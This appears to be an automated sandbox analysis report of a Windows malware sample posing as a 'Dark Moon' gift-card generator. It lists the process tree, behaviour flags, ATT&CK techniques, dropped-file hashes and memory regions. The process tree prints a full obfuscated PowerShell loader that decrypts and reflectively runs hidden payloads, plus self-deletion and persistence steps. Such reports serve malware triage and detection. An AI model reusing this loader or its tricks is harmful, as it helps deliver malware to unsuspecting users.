C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{91e09b03-35df-4bba-aea6-8ccfeaf5dfb6}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{6c91e53e-c30b-499e-a286-1477d44e4c63}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{51ca53e0-93c1-487f-8281-43a4cf8359ba}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{a16afd91-fd8d-4a1f-a81c-eafa4eeb53da}5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\starter.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K uni.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{14cbe746-b459-419f-970d-795e1d43a466}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{484ffc15-9427-45c5-b5b8-c2af2b561ead}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe" & exit5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"6⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe"6⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\main.exemain.exe3⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c "Dark Moon gen.bat"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping localhost -n 15⤵
- Runs ping.exe
-
C:\Windows\system32\PING.EXEping discord.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.paysafecard.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.amazon.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping play.google.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping store.steampowered.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping netflix.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.spotify.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.xbox.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 05⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\PING.EXEping www.google.com5⤵
- Runs ping.exe
-
C:\Windows\system32\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 460 -p 5436 -ip 54362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
1Hide Artifacts
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER710.tmp.csvFilesize
41KB
MD5d9725606b1c5e4d4c93e9540d467930f
SHA12ab79d157bd20f544342fce6f0da481e9113e839
SHA256a84f02dfecbd53ba0a61970cdd9c644aa1ff947acd09778089374a9eaaf78549
SHA512f190f13622cc293a98d9aa7a729aecd06aff6016ed638b5c4194da10610c0835ee8db61f829aa23be9ddbb78f3a2d688e383ebdc7416012f69cb41af6afc2684
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER730.tmp.txtFilesize
13KB
MD597c0981231aab96e8a436f2a7ab000c1
SHA10a46c18dc8eaa6a623dcd8b26ae21a5c96eddc2b
SHA2562cc65459d6658a1b0c7c641dfe0bdaaaf3a8ee425a62eb644cafa0a89b832171
SHA512457f23d648d26d73dc15385bfcca3a99377c078c5ec404558ebfe959cd3ad732957429ee0767b33a1bb2a2aeb79f702cc95b0668bff3b2a169a670c2bc4dd86e
-
C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.batFilesize
35KB
MD5c153581143e0b72cecae38a393991a4b
SHA1da43d03b19765594ff124415a060551343823a39
SHA2562fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005
SHA5128c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cxabbtlj.vue.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\$sxr-cmd.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Windows\$sxr-mshta.exeFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
328B
MD5029ce519727817054adfe0157a5caa57
SHA12fab55fa78851d865e2af85635968b9c1a62157b
SHA25640555b5e76e1ab599cc3c1694741f17ec2319c9e814557211d839c7743b480d2
SHA5127fb20e9630fa25203d032066fb17d999ce776649896701b8fedf912b040a77d34681668655fc4241ff70927ba7b1f87211ca3d679f9f93257bfb5f8f34ab7128
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD590e90318f56cceac323696069021d011
SHA1d444bed5a6cfcaedd26b564ecef054b51a354fbd
SHA2564b4fadfa74c9a37770b1de7f914c74c389dc391980366a81179423da7baffdf4
SHA5125bf7378ac2a9d39944589b0df0b27b30d7958984ab867b43a5689c59e2d86b514210c07771614adc4463b916853070e4f721eeaa35d89d38fd5d4649156333f8
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64AFilesize
412B
MD534fc5ce051638bd8c643e6a1fc6bbe4a
SHA1b61433a617cca9e0e063cee0b030299feb2b931a
SHA256e37aa050adc92e2b0e19d0c2135eb5826c7c4ee2fa41d1cd4d58846baed1bcff
SHA512e62b1dab8a5dbca75a893a4efb0f390bb43bc783511e4ad9ec2b5026ac3985acda80df2807d3915747b2e4dc07cd9b0bf6012d499d0df863bb0a7106d5e4d0e7
-
memory/380-112-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmpFilesize
64KB
-
memory/380-104-0x000002063F8A0000-0x000002063F8C7000-memory.dmpFilesize
156KB
-
memory/392-31-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/392-32-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/628-109-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmpFilesize
64KB
-
memory/628-99-0x000001C346940000-0x000001C346962000-memory.dmpFilesize
136KB
-
memory/628-103-0x000001C346970000-0x000001C346997000-memory.dmpFilesize
156KB
-
memory/680-107-0x0000022952940000-0x0000022952967000-memory.dmpFilesize
156KB
-
memory/680-124-0x00007FFEA9930000-0x00007FFEA9940000-memory.dmpFilesize
64KB
-
memory/1292-24-0x00000243B7EB0000-0x00000243B7F08000-memory.dmpFilesize
352KB
-
memory/1292-19-0x00007FFEE9630000-0x00007FFEE96EE000-memory.dmpFilesize
760KB
-
memory/1292-18-0x00007FFEE98B0000-0x00007FFEE9AA5000-memory.dmpFilesize
2.0MB
-
memory/1292-17-0x000002439A960000-0x000002439A984000-memory.dmpFilesize
144KB
-
memory/1292-12-0x000002439C8C0000-0x000002439C8E2000-memory.dmpFilesize
136KB
-
memory/1292-20-0x00000243B73B0000-0x00000243B7E00000-memory.dmpFilesize
10.3MB
-
memory/1292-22-0x00000243B7E00000-0x00000243B7EA6000-memory.dmpFilesize
664KB
-
memory/1292-23-0x00000243B6D60000-0x00000243B6DB6000-memory.dmpFilesize
344KB
-
memory/1292-26-0x00007FFEE98B0000-0x00007FFEE9AA5000-memory.dmpFilesize
2.0MB
-
memory/1292-25-0x000002439A980000-0x000002439A9A2000-memory.dmpFilesize
136KB
-
memory/1292-28-0x000002439A9A0000-0x000002439A9AA000-memory.dmpFilesize
40KB
-
memory/1548-30-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/1548-29-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/2952-60-0x0000015B79230000-0x0000015B792E2000-memory.dmpFilesize
712KB
-
memory/2952-61-0x00007FFEE98B0000-0x00007FFEE9AA5000-memory.dmpFilesize
2.0MB
-
memory/2952-83-0x00007FFEE98B0000-0x00007FFEE9AA5000-memory.dmpFilesize
2.0MB
-
memory/2952-55-0x00007FFEE98B0000-0x00007FFEE9AA5000-memory.dmpFilesize
2.0MB
-
memory/2952-82-0x0000015B70AD0000-0x0000015B70B1E000-memory.dmpFilesize
312KB
-
memory/2952-57-0x0000015B6FFC0000-0x0000015B70546000-memory.dmpFilesize
5.5MB
-
memory/2952-58-0x0000015B78620000-0x0000015B78DEA000-memory.dmpFilesize
7.8MB
-
memory/2952-59-0x0000015B78DF0000-0x0000015B7922E000-memory.dmpFilesize
4.2MB
-
memory/2952-85-0x0000015B70BB0000-0x0000015B70BE6000-memory.dmpFilesize
216KB
-
memory/2952-84-0x00007FFEE9630000-0x00007FFEE96EE000-memory.dmpFilesize
760KB
-
memory/2952-69-0x0000015B70B20000-0x0000015B70B70000-memory.dmpFilesize
320KB
-
memory/2952-56-0x00007FFEE9630000-0x00007FFEE96EE000-memory.dmpFilesize
760KB
-
memory/2952-70-0x0000015B70C30000-0x0000015B70CE2000-memory.dmpFilesize
712KB
-
memory/2952-71-0x0000015B712C0000-0x0000015B71482000-memory.dmpFilesize
1.8MB
-
memory/2952-81-0x0000015B70B70000-0x0000015B70BAC000-memory.dmpFilesize
240KB
-
memory/4552-90-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4552-95-0x0000000001780000-0x000000000179A000-memory.dmpFilesize
104KB
-
memory/4552-93-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4552-91-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/4936-88-0x00007FFEE98B0000-0x00007FFEE9AA5000-memory.dmpFilesize
2.0MB
-
memory/4936-89-0x00007FFEE9630000-0x00007FFEE96EE000-memory.dmpFilesize
760KB
-
memory/4936-86-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4936-87-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB
-
memory/4936-97-0x0000000140000000-0x0000000140028000-memory.dmpFilesize
160KB